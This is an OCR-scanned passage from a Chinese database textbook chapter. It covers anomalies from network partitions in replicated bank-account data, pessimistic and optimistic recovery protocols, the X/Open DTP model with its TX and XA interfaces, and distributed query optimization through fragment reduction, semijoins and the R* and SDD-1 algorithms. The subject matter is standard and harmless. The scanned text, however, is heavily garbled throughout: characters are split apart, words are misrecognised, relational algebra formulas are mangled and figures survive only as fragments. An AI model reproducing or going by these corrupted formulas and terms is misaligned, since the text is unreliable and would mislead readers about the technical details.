用 为 止 。 如 果 数 据 被 复制 ， 过 程 将 更 为 复杂 。 下 面 考虑 当 网 络 出 现 分 区 时 副本 数据 可 能 出 现 
异常 的 两 个 例子 ， 例 子 用 到 包含 顾客 余额 的 一 个 简单 银行 账户 关系 。 
识别 更 新 

如 图 25-12 所 示 ， 要 观察 用 户 在 不 同 分 区 部 分 是 否 成 功 完 成 了 更 新 操作 非常 困难 。 在 分 
区 P1, 一 个 事务 从 账户 上 取 走 10 英镑 (余额 为 bal:)， 在 分 区 P，,，， 两 个 事务 先后 从 这 同一 账 
户 各 取 走 5 英镑 。 假 定 在 开始 时 ， 两 个 分 区 部 分 的 余额 bal 中 均 为 100 英镑 ， 那 么 在 结束 后 
两 个 bal, 中 均 为 90 英镑 。 当 该 网 络 分 区 故障 恢复 时 ， 若 仅 检 查 bal; 的 值 并 假设 “ 值 相 同 该 
域 即 为 一 致 的 ”并 不 合适 。 因 为 若 完 全 执行 这 三 个 事务 ，bal, 的 值 应 当 是 80 英镑 才 对 。 
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图 25-12 识别 更 新 


维护 完整 性 

如 图 25-13 所 示 ， 用 户 在 不 同 的 分 区 部 分 成 功 地 完成 了 更 新 却 轻易 地 破坏 了 完整 性 约 
束 。 假 设 银行 约束 用 户 账户 (余额 bal) 不 能 低 于 0 英镑。 在 分 区 Pi 中 ,一 个 事务 从 账户 中 
取 走 60 英镑 ， 在 分 区 P, 中 ， 另 一 个 事务 也 从 同一 个 账户 中 取 走 50 英镑 。 假 设 两 个 分 区 中 
bal 开始 都 为 100 英镑 ， 那 么 事务 完成 后 一 个 为 40 英镑 ， 另 一 个 为 50 英镑 。 两 者 都 没有 破 
坏 完整 性 约束 。 然 而 ， 当 分 区 故障 恢复 且 两 个 事务 都 执行 完 时 ， 账 户 的 余额 将 是 一 10 英镑 ， 
显然 完整 性 约束 被 破坏 。 





Time Pi Pp; 

tl begin_transaction begin_transaction 

ty balx =bal ~ 60 balx =balx - 50 
6 write(balx) write(balx) 


ta commit commit 
图 25-13 ”维护 完整 性 


在 分 区 的 网 络 中 人 处理 数据 ， 需 要 权衡 可 用 性 和 正确 性 ( Davidson，1984 ; Davidson 等 
人 ，1985 )。 如 果 在 分 区 的 网 络 中 不 允许 处 理 复制 数据 ， 那 么 绝对 正确 性 就 容易 获得 。 另 一 
方面 ， 如 果 在 分 区 的 网 络 中 对 复制 数据 的 处 理 没有 任何 约束 ， 那 么 可 用 性 达到 最 大 。 

一 般 来 说 ,不 可 能 为 任意 分 区 的 网 络 设计 出 一 种 非 阻 塞 原子 提交 协议 ( Skeen，1981 )。 
由 于 恢复 与 并 发 控制 紧密 相关 ， 因 此 网 络 分 区 所 用 恢复 技术 依赖 于 具体 使 用 的 并 发 控制 策 
略 。 方 法 可 以 分 为 乐观 和 悲观 两 类 。 

悲观 协议 ”悲观 协议 看 重 数 据 库 的 一 致 性 胜 过 可 用 性 ， 因 此 如 果 正 确 性 得 不 到 保证 的 
话 ， 就 不 允许 在 分 区 的 网 络 中 执行 事务 。 这 个 协议 使 用 悲观 并 发 控制 算法 ， 比 如 在 25.2 节 
中 讨论 的 主 备份 2PL 或 多 数 锁 。 使 用 这 类 方法 的 恢复 就 非常 简单 ， 因 为 更 新 都 被 限制 在 单 
个 、 可 相互 区 别 的 分 区 中 。 网 络 的 恢复 只 需 对 所 有 其 他 结 点 简单 地 广播 更 新 消息 即 可 。 

乐观 协议 ” 另 一 方面 ， 乐观 协 议 选择 数据 库 的 可 用 性 胜 过 一 致 性 。 对 于 并 发 控制 使 用 
乐观 方法 ， 其 中 允许 在 不 同 的 分 区 单独 进行 更 新 。 因 此 ， 当 结 点 恢复 的 时 候 可 能 会 发 生 不 
一 致 。 

为 了 确定 是 否 发 生 了 不 一 致 ， 可 以 使 用 优先 图 来 记录 数据 中 的 相互 依赖 关系 。 优 先 图 
与 22.2.4 节 中 讨论 的 等 待 图 有 些 类 似 ， 用 来 表示 哪个 事务 读 取 并 更 新 了 哪个 数据 项 。 当 网 络 
分 区 发 生 的 时 候 ， 更 新 可 以 无 约束 地 进行 ， 而 每 个 分 区 都 维护 一 个 优先 图 。 当 网 络 恢复 的 时 
候 ， 将 各 个 分 区 的 优先 图 进行 合并 。 如 果 在 优先 图 中 存在 环 就 说 明 出 现 了 不 一 致 问题 。 不 一 
致 问题 的 解决 取决 于 事务 的 语义 ， 因 此 通常 如 果 没 有 用 户 的 干涉 ， 靠 恢复 管理 器 重新 建立 一 
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致 性 几乎 不 可 能 。 


25.5 X/Open 分 布 式 事务 处 理 模 型 


Open Group 是 一 个 中 立 的 国际 联盟 ， 包 含有 用 户 、 软 件 供 应 商 、 硬 件 供应 商 ， 其 使 命 
是 创建 可 行 的 全 球 信息 基础 设施 。 它 是 由 X/Open 有 限 公司 (创建 于 1984 年 ) 和 开放 软件 基 
金 (Open Software Foundation， 创 建 于 1988 年 ) 于 1996 年 2 月 合并 组 建 的 。X/Open 创建 
了 分 布 式 事务 处 理 (DTP) 工作 组 ， 目 的 在 于 规范 和 制定 适当 的 事务 处 理 程序 接口 。 在 当时 ， 
事务 处 理 系统 都 是 完整 的 操作 环境 ， 从 屏幕 定义 到 数据 库 实 现 。 该 工作 组 不 是 试图 提供 一 组 
包罗 万 象 的 标准 ， 而 是 将 精力 集中 在 那些 能 够 提供 ACID 〈 曾 在 22.1.1 节 中 讨论 的 原子 性 、 
一 致 性 、 隔 离 性 和 持久 性 ) 性 质 的 事务 处 理 系统 机 制 上 。 后 来 出 现 的 X/Open DTP 标准 制定 
了 三 个 相互 作用 的 组 件 : 应 用 程序 、 事 务 管理 器 (TM) 和 资源 管理 器 (RM )。 

任何 实现 事务 数据 的 子 系统 都 可 以 是 一 个 资源 管理 器 ， 比 如 一 个 数据 库 系 统 、 一 个 事 
务 性 文件 系统 或 一 个 事务 性 会 话 管理 器 。TM 负责 定义 事务 的 范围 ， 也 就 是 哪些 操作 是 事务 
的 一 部 分 。 它 也 负责 为 事务 分 配 一 个 唯一 的 标识 并 与 其 他 组 件 共享 ， 通 过 与 其 他 组 件 协商 决 
定 该 事务 的 结果 。 一 个 TM 也 可 以 和 其 他 TM 通信 以 协调 分 布 式 事务 的 完成 。 应 用 程序 调用 
TM 来 启动 一 个 事务 ， 然 后 按 应 用 程序 的 逻辑 调用 资源 管理 器 对 数据 进行 操控 ， 并 最 终 调 用 
TM 结束 该 事务 。TM 与 多 个 资源 管理 器 进行 通信 以 协调 事务 的 完成 。 

此 外 ，X/Open 模型 定义 了 几 种 接口 ， 如 图 25-14 所 示 。 应 用 程序 可 以 使 用 TX 接口 与 
TM 进行 通信 。TX 接口 提供 了 定义 事务 范围 (有 时 称 为 事务 定 界 ) 和 是 否 提交 /撤销 事务 的 
过 程 调用 。TM 通过 XA 接口 与 各 个 资源 管理 器 交换 事务 信息 。 最 终 ， 应 用 程序 可 以 通过 本 
地 编程 接口 ， 如 SQL 或 ISAM 来 与 各 个 资源 管理 器 直接 进行 通信 。 





Prepare, Commit, Abort 


图 25-14 X/Open 接口 


TX 接口 包含 下 列 过 程 : 

e tx_open 和 tx_close， 用 于 打开 和 关闭 与 TM 的 会 话 。 

e tx_begin， 用 于 启动 一 个 新 事务 。 

e tx_commit 和 tx_abort， 用 于 提交 和 撤销 一 个 事务 。 

XA 接口 包含 下 列 过 程 : 

e xa_open 和 xa_close， 用 于 同 资源 管理 器 建立 和 终止 连接 。 

e xa_start 和 xa_end， 启 动 一 个 给 定 ID 的 新 事务 和 结束 该 事务 。 
e xa_rollback， 回 滚 给 定 ID 的 事务 。 

e xa_prepare， 准 备 全 局 提交 / 撤销 给 定 ID 的 事务 。 

e xa_commit， 全 局 提交 给 定 ID 的 事务 。 
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exa_recover， 检 索 已 准备 好 正 试探 提交 或 试探 撤销 的 事务 的 列表 。 当 某 个 资源 管理 器 
阻塞 时 ， 能 强制 按 启 发 式 决定 方式 操作 (通常 是 撤销 )， 释 放 被 锁定 资源 。 当 TM 恢 
复 时 ,该 事务 列表 可 以 用 于 告知 处 于 疑惑 中 的 事务 的 实际 决定 (提交 或 撤销 )。 从 它 
的 日 志 上 也 可 以 向 应 用 程序 通报 任何 做 错 了 的 试探 决定 。 
e xa_forget， 人 允许 资源 管理 器 忘记 给 定 ID 的 试探 式 事务 。 
例如 ， 考 虑 如 下 的 应 用 代码 段 : 
tx_begin(); 
EXEC SQL UPDATE Staff SET salary = salary *1.05 
WHERE position = ‘Manager’; 
EXEC SQL UPDATE Staff SET salary = salary *1.04 
WHERE position <> ‘Manager’; 
tx_commit(); 
当 调 用 级 接口 ( CLI) 函数 tx_begin( ) 被 应 用 程序 调用 的 时 候 ，TM 记录 事务 开始 并 且 
得 到 唯一 的 事务 标识 符 。 然 后 ，TM 使 用 XA 接口 通知 SQL 数据 库 服务 器 事务 已 经 运行 。 一 
且 资 源 管理 器 接收 到 这 个 信息 ， 它 将 认定 所 接 到 的 任何 来 自 应 用 程序 的 调用 都 是 该 事务 的 一 
部 分 ， 在 该 例 中 是 两 个 SQL 更 新 语句 。 最 后 ， 当 应 用 程序 调用 tx_commit( ) 函数 时 ，TM 与 
RM 交互 以 提交 事务 。 如 果 应 用 不 只 使 用 一 个 资源 管理 器 ， 这 种 情况 下 ，TM 使 用 两 段 提 交 
协议 来 同步 多 个 资源 管理 器 的 提交 。 
在 分 布 式 环境 中 ， 必 须 修改 以 上 所 描述 的 模型 以 支持 包含 多 个 子 事务 的 事务 ， 每 个 子 事 
务 运 行 在 一 个 远程 结 点 的 远程 数据 库 上 。 分 布 式 环境 的 X/Open DTP 模型 如 图 25-15 所 示 。 
X/Open 模型 和 应 用 之 间 使 用 一 种 特殊 类 型 的 资源 管理 器 来 进行 通信 ， 这 种 管理 器 称 为 通信 
管理 器 (CM)。 就 像 所 有 其 他 资源 管理 器 一 样 ， 事 务 通过 TM 来 通知 CM， 应 用 程序 使 用 本 
地 接口 调用 CM。 在 这 种 情况 下 需要 两 种 机 制 : 远程 调用 机 制 和 分 布 式 事务 机 制 。 远 程 调 用 
机 制 是 由 ISO 的 ROSE (Remote Operation Service， 远 程 操 作 服 务 ) 和 远程 过 程 调用 (RPC ) 
机 制 提供 的 。X/Open 指定 开放 式 系统 互联 事务 处 理 (OSI-TP) 通信 协议 来 调整 分 布 式 事务 
(TM-TM 接口 ) 。 
X/Open DTP 不 仅 支 持平 板 事务 ， 还 支持 链 式 事务 和 嵌 套 事务 (参见 22.4 节 )。 在 秀 套 
事务 中 ， 如 果 其 任何 子 事务 撤销 ， 那 么 该 事务 也 将 撤销 。 


和 








Outgoing Incoming 


Requests Requests 





Remote reguest "| 


图 25-15 分 布 式 环境 中 的 X/Open 接 


X/Open 参考 模型 已 经 在 行业 中 很 好 地 建立 。 很 多 第 三 方 的 事务 处 理 (TP) 监视 器 支持 
TX 接口 ， 并 且 许 多 商业 数据 库 供 应 商 提供 了 XA 接口 的 实现 。 突 出 的 例子 包括 IBM 系统 的 
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CICS 和 Encina (主要 用 在 IBM AIX 或 Windows NT 上 ， 现 在 与 IBM TXSeries 捆绑 在 一 起 )、 
BEA Systems 的 Tuxedo 、Oracle 、Informix 和 SQL Server。 


25.6 分布 式 查询 优化 


在 第 23 章 中 曾 讨 论 过 集中 式 RDBMS 的 查询 处 理 和 优化 ， 涉 及 两 种 查询 优化 技术 : 

。 第 一 种 使 用 启发 式 规则 对 查询 中 的 操作 进行 排序 。 

。 第 二 种 对 比 不 同 策略 的 代价 ， 选 择 一 个 使 用 资源 最 少 的 策略 。 

两 种 情况 都 是 首先 将 查询 表示 为 一 棵 关系 代数 树 以 便于 后 续 处 理 。 分 布 式 查询 优化 由 于 
数据 分 布 变 得 更 复杂 。 图 25-16 显示 了 分 布 查询 如 何 分 为 四 个 层次 进行 处 理 与 优化 。 


段 上 的 关系 演算 查询 


段 上 带 通信 
原 语 的 优化 查询 





优化 的 本 地 查询 
图 25-16 分 布 查询 处 理 


e 查询 分 解 。 这 层 针对 基于 全 局 关系 表示 的 查询 ， 采 用 第 23 章 讨 论 的 技术 进行 部 分 优 
化 ,结果 是 一 棵 基于 全 局 关系 的 关系 代数 树 。 

e 数据 定位 。 这 层 考虑 数据 是 如 何 分 布 的 。 优 化 是 通过 将 关系 代数 树 的 叶 结 点 中 全 局 
关系 ， 用 一 个 重 构 算法 (有 时 亦 称 数据 定位 程序 ) 替代 ， 即 给 出 由 合适 的 段 重 构 全 局 
关系 的 关系 代数 操作 。 

® 全 局 优化 。 这 层 通过 考虑 统计 信息 找 出 近似 最 优 的 执行 策略 。 结 果 是 基于 段 和 一 些 
通信 原 语 的 执行 策略 ， 通 信 原 语 用 于 说 明 哪 部 分 查询 送 到 哪个 本 地 DBMS 执行 ， 结 
果 送 哪里 。 

e 局 部 优化 。 此 前 三 层 均 在 控制 结 点 〈 即 该 查询 发 出 的 结 点 ) 进行 ， 本 层 在 涉及 该 查询 
的 各 个 本 地 结 点 上 进行 。 每 个 本 地 DBMS 采用 第 23 章 讨 论 的 技术 进行 本 地 优化 。 
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下 面 讨 论 该 结构 的 中 间 两 层 。 


25.6.1 数据 定位 


如 上 所 述 ， 本 层 的 目标 是 针对 一 个 用 关系 代数 树 表示 的 查询 ， 考 虑 到 数据 分 布 的 因素 后 
如 何 用 启发 式 规 则 进行 优化 。 为 此 ， 将 树 的 叶 结 点 上 的 全 局 关系 用 重 构 算法 替换 ， 也 就 是 用 
合适 的 段 重 构 全 局 关系 的 关系 代数 操作 。 对 于 水 平分 段 ， 重 构 算法 是 合并 操作 。 对 于 垂直 分 
段 ， 重 构 算 法 是 连接 操作 。 蔡 换 过 重 构 算法 后 的 关系 代数 树 称 为 通用 关系 代数 树 。 可 使 用 规 
约 技术 生成 更 加 简单 优化 的 查询 。 具 体 使 用 何 种 规约 技术 依赖 于 分 段 的 类 型 。 考 虑 下 面 几 种 
分 段 类 型 的 规约 技术 : 

。 基本 水 平分 段 。 

。 垂直 分 段 。 

e 导出 水 平分 段 。 
基本 水 平分 段 规约 

对 于 基本 水 平分 段 ， 考 虑 两 种 情况 : 对 选择 操作 的 规约 和 对 连接 操作 的 规约 。 在 第 一 种 
情况 中 ， 如 果 选 择 谓词 与 分 段 的 定义 矛盾 ， 那 么 将 导致 中 间 结 果 为 空 ， 操 作 可 被 忽略 。 在 第 
二 种 情况 中 ， 首 先 使 用 变换 规则 ， 用 合并 操作 代替 连接 操作 : 

(RIUR2) pqR3 王 (Ri Ra)U (CR2 Pa R;) 

然后 检查 每 个 单独 的 连接 操作 ， 判 断 是 否 可 从 结果 中 删除 无 用 连接 。 如 果 分 段 谓 词 不 重 
琶 那 么 就 存在 无 用 连接 。 在 DDBMS 中 这 种 变换 规则 很 重要 ， 因 为 它 允 许 两 个 关系 连接 实 
现 为 部 分 连接 的 并 集 ， 而 部 分 连接 可 以 并 行 地 执行 。 在 例 25.2 中 给 出 了 这 两 种 规约 规则 的 
应 用 。 


| 例 25.2 办 基本 水 平分 段 的 规约 
列 出 公寓 的 出 租 信息 及 与 其 相关 的 分 公司 细节 。 
可 以 用 SQL 将 这 个 查询 表示 为 : 
SELECT * 


FROM Branch b, PropertyForRent p 
WHERE b.branchNo = p.branchNo AND p.type = ‘Flat’; 


假定 PropertyForRent 和 Branch 的 水 平分 段 如 下 : 

Pl: GoranchNo ='B003' A ype ='House’ (PropertyForRent) Bi: Oiancnwo ='B00% (Branch) 

P OpranchNo -.B009'A ype -Fe (PropertyForRent) By: Obrancnno sw'B009 (Branch) 

Ps: OpbanchNe #:B003' (PropertyForRent) 

这 个 查询 的 通用 关系 代数 树 如 图 25-17a 所 示 。 如 果 交 换 选 择 操 作 和 合并 操作 ， 得 到 如 
图 25-17b 所 示 的 关系 代数 树 。 通 过 观察 可 知 这 樟树 的 下 面 这 个 分 支 是 多 余 的 (不 会 产生 任 
何 结果 元 组 )， 所 以 可 以 删除 : 

Oiype="Flat (PI) = Oype='Flat (ObranchNo="B003" A type="House'(PropertyForRent)) = 人 

进一步 ， 因 为 选择 谓词 (gpiype-'Fla' ) 是 分 段 P; 定义 的 一 个 子 集 ， 所 以 选择 亦 可 省 略 。 
如 果 现 在 交换 连接 和 合并 操作 ， 可 以 得 到 如 图 25-17c 所 示 的 树 。 由 于 第 二 个 和 第 三 个 连接 
也 没有 结果 ， 所 以 它们 也 被 删除 ， 图 25-17d 显示 了 规约 后 的 查询 。 
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Pep.branchNo=p.branchNo Dp.branchNo =p.branchNo 


| A Fn We 


WU Optype='Flat  B 


pa | 


Pp! PP, Ps Ps 
a ) 通用 树 b ) 对 选择 进行 规约 得 到 的 树 

Pb.branchNo=pbranchNo Pb.branchNo=p.branchNo Dap.branchNo=p.branchNo Pep.branchNo=p.branchNo 

Pp» Bi Ps B2 Gptype=Fat Bi Optype=Flat  B2 

Ps Ps 
c ) 交换 连接 和 合并 操作 后 得 到 的 树 
Uy 

dd Pp.branchNo=p.branchNo 

P2 B 1 Gptype='Flat B2 

Ps 
d ) 规约 树 


图 25-17 例 25.2 的 关系 代数 树 


垂直 分 段 的 规约 


垂直 分 段 的 规约 是 删除 那些 除 主 关键 字 以 外 ， 与 投影 属性 无 公共 属性 的 垂直 分 段 。 


| 例 25.3 六 垂直 分 段 规约 
列 出 每 名 职员 的 姓名 。 
可 以 用 SQL 将 这 个 查询 表示 为 : 
SELECT fName, IName 
FROM Staff; 


在 这 里 还 是 使 用 例 24.3 中 使 用 的 分 段 模式 : 
Si 和 II staffNo, position, sex, DOB, salary( Staff) 


2 2 II staffNo, fName, IName, branchNo( Staff) 
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这 个 查询 的 通用 树 如 图 25-18a 所 示 。 通 过 交换 投影 和 连接 操作 ,Si 的 投影 操作 是 多 余 


的 ， 因 为 投影 属性 fName 和 1Name 不 是 Si 的 一 部 分 。 规 约 树 如 图 25-18c 所 示 。 
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Tyame, IName 
Tleyame, IName AAA 
ge {Name, i staffNo 1 7 IName 
S > Si Ss; 8; 
a ) 通用 树 b ) 交换 投影 和 连接 操作 c ) 规约 树 
图 25-18 例 25.3 的 关系 代数 树 « 


导出 水 平分 段 的 规约 
导出 水 平分 段 的 规约 同样 使 用 交换 连接 和 合并 操作 的 变换 规则 。 此 时 ， 用 到 一 个 关系 的 
分 段 是 基于 另 一 个 关系 的 知识 ， 在 交换 过 程 中 ， 就 发 现 某 些 部 分 的 连接 是 多 余 的 。 


| 例 25.4 办 导出 水 平分 段 规约 
列 出 分 公司 B003 的 客户 注册 信息 和 分 公司 的 详细 信息 。 
可 以 用 SQL 将 这 个 查询 表示 为 : 
SELECT * 


FROM Branch b, Client c 
WHERE b.branchNo = c.branchNo AND b.branchNo = ‘B003’; 


假设 Branch 如 在 例 25.2 中 一 样 进 行 水 平分 段 ， 而 Client 的 分 段 来 源 于 Branch: 

B, 王 cbranchNo='B003' (Branch) B;= obranchNo (=*B003’ (Branch) 

Ci 一 Client |> wanchNe Bi 这] 2 

通用 关系 代数 树 如 图 25-19a 所 示 。 如 果 对 选择 和 合并 关系 进行 交换 ， 分 段 B: 的 选择 是 
多 余 的 ， 树 的 这 个 分 支 可 以 删除 。 整 个 选择 操作 可 以 删除 ， 因 为 分 段 Bi 本身 定义 在 分 公司 
B003 上 。 如 果 此 时 交换 连接 和 合并 操作 ， 可 以 得 到 如 图 25-19b 所 示 的 树 。B1 和 Ca 的 第 二 
个 连接 操作 产生 了 空 关 系 ， 可 以 删除 ， 最 后 得 到 了 如 图 25-19c 所 示 的 规约 树 。 


Cs 
| 


a) 通用 树 b ) 交换 连接 和 合并 操作 得 到 的 树 c ) 规约 树 
图 25-19 例 25.4 的 关系 代数 树 《《 


25.6.2 分布 式 连接 

连接 操作 是 开销 最 大 的 关系 代数 操作 之 一 。 在 分 布 式 查 询 优化 之 中 使 用 的 一 种 方法 是 
通过 半 连 (参见 5.1.3 节 ) 的 组 合 来 蔡 代 连接 。 半 连 操作 的 一 个 很 重要 的 特点 就 是 可 以 缩减 
作为 操作 数 的 关系 的 大 小 。 当 耗费 的 成 分 主要 是 通信 时 间 时 ， 半 连 操作 通过 减少 在 结 点 间 数 
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据 传输 的 数量 来 改进 分 布 式 连接 的 性 能 ， 非 常 有 效 。 

例如 ， 假设 希望 在 结 点 S, 上 求 连接 表达 式 Ri pdax R, 的 值 ， 其 中 Ri 和 Rs 分 别 是 存储 在 
结 点 S 和 S; 的 段 。R 和 R; 分 别 定义 在 属性 A=(x, au aa …, an) 和 B=(x, bi, bz *…, bn) 上 。 
可 以 将 这 个 用 半 连 操作 改造 。 首 先 ， 注 意 到 可 以 将 连接 重 写 为 : 

Ri xx R2 一 (Ri >。 R2) Mm Rs 

从 而 可 以 按照 如 下 步骤 计算 连接 操作 的 值 : 

(1 ) 在 结 点 $: 计算 R'= II (Rs )( 在 结 点 S1 只 需要 连接 属性 )。 

(2 ) 向 结 点 Si 传送 R'。 

(3 ) 在 结 点 S1 计算 R" 王 Ri pq R'。 

(4) 向 结 点 S: 传送 R"。 

(5 ) 在 结 点 S: 计算 R" raqx Rz。 

如 果 Ri 中 只 有 少数 几 个 元 组 参与 Ri 和 Rs: 的 连接 运算 ， 使 用 半 连 操作 是 可 取 的 。 如 果 
Ri 中 的 大 多 数 元 组 都 将 参与 连接 运算 ， 直 接连 接 更 好 一 些 ， 因 为 半 连 方法 要 求 多 传输 一 次 
连接 属性 的 投影 数据 。 关 于 半 连 操作 的 更 多 信息 ， 可 以 参见 Bernstein 和 Chiu (1981 )。 应 
当 注 意 到 在 任何 主要 的 商品 化 DDBMS 中 并 没有 使 用 半 连 操作 。 


25.6.3 全 局 优化 


如 前 所 述 ， 这 层 的 目标 是 处 理由 数据 定位 导出 的 查询 规划 ， 找 出 一 个 近似 最 优 的 执行 策 
略 。 与 23.5 节 讨 论 的 集中 式 查询 优化 一 样 ， 这 涉及 估算 不 同 执行 策略 的 代价 并 从 中 选 出 最 
优 的 一 个 。 
代价 

在 集中 式 DBMS ， 执 行 代价 由 IO 和 CPU 代价 构成 。 由 于 磁盘 访问 比 主 存 访问 慢 得 多 ， 
在 集中 式 DBMS 中 查询 处 理 的 主要 开销 花 在 磁盘 访问 上 ， 它 也 是 第 23 章 做 代价 估算 时 集中 
考虑 的 因素 。 然 而 ， 在 分 布 式 环境 中 ， 比 较 不 同 策略 时 ， 基 本 网 络 的 速率 不 得 不 考虑 。 正 如 
在 24.5.3 节 所 述 ， 一 个 广域网 ( WAN) 可 能 仅 有 每 秒 几 k 字 节 的 带宽 ， 此 时 本 地 的 所 有 人 处理 
开销 可 以 忽略 不 计 。 另 一 方面 ， 局 域 网 一 般 比 广域网 快 得 多 ,但 比 磁盘 访问 还 是 慢 ， 此 时 没 
有 一 种 开销 占 主导 地 位 ， 所 有 因素 都 须 考虑 。 

在 讨论 集中 式 DBMS 时 ， 我们 曾 给 出 一 个 基于 查询 中 所 有 操作 的 总 代价 (时间) 的 代价 
模型 。 另 一 种 代价 模型 是 基于 响应 时 间 ， 即 查询 从 开始 到 结束 所 用 的 时 间 。 后 一 种 模型 考虑 
了 分 布 式 系统 的 固有 并 行 性 。 这 两 种 代价 模型 可 能 产生 不 同 的 结果 。 例 如 ， 考虑 图 25-20 所 
示 数 据 传输 ， 假 设 有 x 位 数据 从 结 点 1 转 到 结 点 2，y 位 数据 从 结 点 2 传 到 结 点 3。 用 总 代 
价 公式 计算 这 些 操作 的 代价 为 : 

总 时 间 三 2*Co 十 (x 十 y)/ 传输 率 
用 响应 时 间 公 式 计算 这 些 操 作 的 代价 为 : 
响应 时 间 三 max{Co 十 x/ 传输 率 ，Co 十 y/ 传输 率 } 

本 节 剩 下 的 篇 幅 ， 我 们 讨论 两 个 分 布 式 查询 优化 算法 : 

e R* 算 法 。 

。 SDD-1 算法 。 
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结 点 2 一 一 > 结 点 3 
x 位 总 时 间 =2*Co+(x+y)/ 传 输 率 
响应 时 间 =max{Co+x/ 传 输 率 , Co+y/ 传 输 率 } 


结 点 1 
图 25-20” 结 点 间 传 输 数 据 时 两 种 代价 模型 产生 不 同 结果 的 例 


R* 算法 

R* 是 IBM 研究 所 早 在 1980 年 开发 的 一 个 实验 性 分 布 式 DBMS， 它 沿用 了 更 早 的 
项 目 System R 中 提出 的 才干 机 制 ， 当 然 针对 分 布 式 环境 进行 了 适应 性 改造 ( Williams 
等 ，1982 )。R* 的 主要 设计 目标 是 位 置 透明 、 结 点 自治 和 最 小 性 能 开销 。 为 支持 数据 分 
布 而 对 System R 所 作 的 扩充 包括 数据 定义 、 事 务 处 理 、 授 权 访 问 与 查询 的 编译 、 优 化 和 
执行 。 

关于 分 布 式 查询 优化 R* 采用 的 是 基于 总 代价 的 代价 模型 和 静态 查询 优化 上 咒 〈 Selinger 
和 Abida, 1980; Lohman 等 ，1985 )。 像 集中 式 系统 System R 的 优化 器 一 样 ，R* 的 优化 算法 
是 基于 对 所 有 连接 操作 的 顺序 、 连 接 的 方法 〈 骨 套 循环 或 分 类 归并 连接 ) 和 每 个 关系 的 访问 
路 径 的 穷尽 搜索 ， 正 如 23.5 节 讨 论 的 那样 。 当 一 个 连接 涉及 不 同 结 点 的 关系 时 ，R* 要 选择 
在 那个 结 点 执行 这 个 连接 和 在 结 点 之 间 传 输 数 据 的 方法 。 

对 于 连接 (Rb445)， 若 R 在 结 点 1，S 在 结 点 2， 有 三 种 可 能 选择 执行 结 点 : 

e R 所 在 的 结 点 1。 

se S 所 在 的 结 点 2。 

e 某 个 其 他 结 点 (比如 关系 工 所 在 的 结 点 ,，T 为 R 与 S 连接 的 结果 )。 

在 R* 中 有 两 种 方法 在 结 点 间 传 输 数 据 : 

(1) 运送 整个 关系 。 在 此 情形 ， 整 个 关系 被 送 到 连接 结 点 ， 或 在 执行 连接 之 前 被 临时 存 
储 ， 或 当 每 个 元 组 到 达 时 即 参 与 连接 运算 。 

(2 ) 需要 时 推送 元 组 。 在 此 情形 ， 外 关系 所 在 的 结 点 负责 协调 元 组 的 传输 并 直接 使 用 它 
们 而 不 再 临时 存储 它们 。 协 调 结 点 顺序 扫描 外 关系 ， 针 对 每 一 个 连接 属性 的 值 ， 向 内 关系 所 
在 的 结 点 请 求 匹 配 的 元 组 (效果 上 相当 执行 一 次 一 元 组 的 半 连 运算 , 虽然 比 后 者 传送 了 更 多 
的 消息 )。 

第 一 种 方法 与 第 二 种 方法 相 比 数据 传送 量 大 但 消息 传送 少 。 当 连接 方法 与 数据 传送 方法 
进行 组 合 时 ，R* 仅 考 虑 如 下 几 种 可 能 : 

(1 ) 伦 套 循环 法 ， 运 送 整个 外 关系 到 内 关系 所 在 的 结 点 在 此 情形 无 须 任 何 临时 存储 ， 
每 个 元 组 到 达 内 关系 所 在 结 点 时 即 完成 连接 和 运算。 代价 为 ， 

总 代价 二 cost( 嵌 大 循环 ) 十 [Co 十 (nTuples(R)*nBitsInTuple(R)/ 传输 率 ) ] 

(2 ) 分 类 归并 法 ， 运 送 整 个 内 关系 到 外 关系 所 在 的 结 点 ”在 此 情形 元 组 不 能 在 到 达 时 即 

完成 连接 运算 ， 不 得 不 临时 存储 。 代 价 为 : 
总 代价 一 cost (在 结 点 1 存储 S) 十 cost (分 类 归并 ) 
十 [C0 十 (nTuples(S)*nBitsInTuple(S)/ 传输 率 ) ] 

(3 ) 和 做 套 循 环 法 ， 针 对 外 关系 每 个 元 组 推送 需要 的 内 关系 元 组 ， 元 组 可 在 到 达 结 点 时 完 

成 连接 运算 。 代 价 为 : 
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总 代价 二 cost( 嵌 大 ,循环 ) 十 (nTuples(R)* [Co 十 nBitsInTuple(A)/ 传输 率 ) ] 
十 (nTuples(R)* [C0 十 (AVG(R,S)*nBitsInTuple(S)/ 传输 率 ) ] 
其 中 AVG(R, S) 指 $ 中 能 与 R 一 个 元 组 匹配 的 平均 元 组 数 ， 因 此 
AVG(R, S)=nTuples(S Da R)/nTuples(R) 

(4) 分 类 归并 法 ， 针 对 外 关系 每 个 元 组 推送 需要 的 内 关系 元 组 ， 元 组 可 在 到 达 结 点 时 完 
成 连接 运算 。 代 价 分 析 类 似 前 面 ， 留 给 读者 练习 。 

(5 ) 运送 两 个 关系 到 第 三 结 点 ， 首 先 内 关系 被 移送 到 第 三 结 点 作为 临时 关系 存储 起 来 ， 
然后 是 外 关系 ， 外 关系 的 每 个 元 组 可 在 到 达 结 点 时 即 可 与 临时 存储 的 内 关系 完成 连接 运算 。 
此 时 用 符 套 循环 法 和 分 类 归并 法 均 可 。 此 代价 分 析 可 由 前 面 的 代价 分 析 获 得 ， 也 留 作 读者 
练习 。 

如 果 一 个 查询 将 被 多 次 执行 ，R* 用 这 种 方法 对 可 能 的 多 种 策略 进行 评估 还 是 值得 
的 。 虽 然 由 Selinger 和 Abida 提出 的 这 个 算法 考虑 了 分 段 的 情况 ,但 R* 实现 时 只 考虑 整个 
关系 。 

SDD-1 算法 

SDD-1 是 另 一 个 实验 性 的 分 布 式 DBMS， 它 由 美国 计算 机 公司 ( Computer Corporation 
of America) 研究 部 在 20 世纪 70 年代 末 80 年 代 初 推出 ， 运 行 在 通过 Arpanet 联 入 网 络 的 
DEC PDP-11 上 (Rothnie 等 ，1980)。 它 提供 完全 的 位 置 、 分 段 和 复制 独立 性 。SDD-1 的 优 
化 器 基于 早期 的 “ 疏 山 ”算法 ， 这 是 一 种 贪 禁 算 法 ， 它 从 任意 一 个 初始 方案 起 步 ， 不 断 迭 代 
改进 (Wong, 1977 )。 半 连 运算 被 引入 该 算法 ， 目 的 在 于 减少 参与 连接 运算 的 关系 的 元 组 数 。 
与 R+ 一 样 ，SDD-1 优化 器 的 目标 是 最 小 化 总 代价 ， 但 与 R* 不 同 的 是 ， 它 忽略 本 地 处 理 代 
价 ， 而 仅 考 虑 通信 消息 的 量 。 又 与 R* 相同 的 是 ， 查 询 优化 为 静态 的 。 

